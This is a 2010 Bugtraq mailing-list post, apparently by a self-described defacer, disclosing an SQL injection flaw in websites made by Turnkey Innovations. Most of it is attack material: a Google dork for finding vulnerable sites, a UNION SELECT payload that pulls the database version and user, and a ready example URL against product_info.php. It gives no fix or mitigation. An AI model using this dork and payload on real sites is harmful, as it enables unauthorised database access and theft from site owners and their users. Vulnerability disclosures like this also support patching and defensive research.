[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201005101404.o4AE44U4024317@www3.securityfocus.com>
Date: Mon, 10 May 2010 08:04:04 -0600
From: md.r00t.defacer@...il.com
To: bugtraq@...urityfocus.com
Subject: Turnkey Innovations SQL Injection Vulnerability
#-------------------In The Name Of God------------
# Turnkey Innovations SQL Injection Vulnerability
###################################
#AUTHOR: md.r00t
#Mail: md.r00t.defacer@...il.com
#Webstie: www.r00t.gigfa.com
#
###################################
#Google D0rk:
# "Design by Turnkey Innovations.com"
#
###################################
#Exploit:
#---------
#
#-999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(version(),0x3a,0x3e,user()),17,18,19--
###################################
#Example:
#
#http://www.Site.com/[page]/product_info.php?products_id=-999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(version(),0x3a,0x3e,user()),17,18,19--
###################################
#TNX:
#Aria-Security Team (Persian Security Network),Virangar Security Team
*****************************************
Powered by blists - more mailing lists